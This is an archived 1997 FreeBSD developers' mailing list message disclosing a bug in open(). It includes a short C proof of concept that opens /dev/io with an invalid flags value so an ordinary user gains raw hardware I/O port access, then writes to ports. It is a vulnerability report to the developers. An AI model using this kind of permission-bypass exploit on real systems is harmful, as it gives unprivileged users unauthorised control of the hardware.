Date: Thu, 23 Oct 1997 10:43:05 -0700 (PDT) From: "Jamil J. Weatherbee" <jamil@trojanhorse.ml.org> To: Terry Lambert <tlambert@primenet.com> Cc: thorpej@nas.nasa.gov, joerg_wunsch@uriah.heep.sax.de, freebsd-hackers@FreeBSD.ORG Subject: Re: Possible SERIOUS bug in open()? (Holy Shit!!!) Message-ID: <Pine.BSF.3.96.971023104116.2942B-100000@trojanhorse.ml.org> In-Reply-To: <199710231724.KAA25749@usr02.primenet.com>
next in thread | previous in thread | raw e-mail | index | archive | help
> Hold a reference instance, but don't let your children have access
> to read or write the device (ie: things like /dev/io).
Wrong! The following code allows the regular joe blow user to read and
write to any port on the machine: (This is really bad)
I've verified that outb() is actually writing.
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <err.h>
#include <machine/cpufunc.h>
int
main(int argc, char **argv)
{
int fd;
fd = open("/dev/io", -1, 0);
if (fd < 0)
err(1, "open");
outb (0x253,0x80);
outb (0x250,0xAA);
}
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.3.96.971023104116.2942B-100000>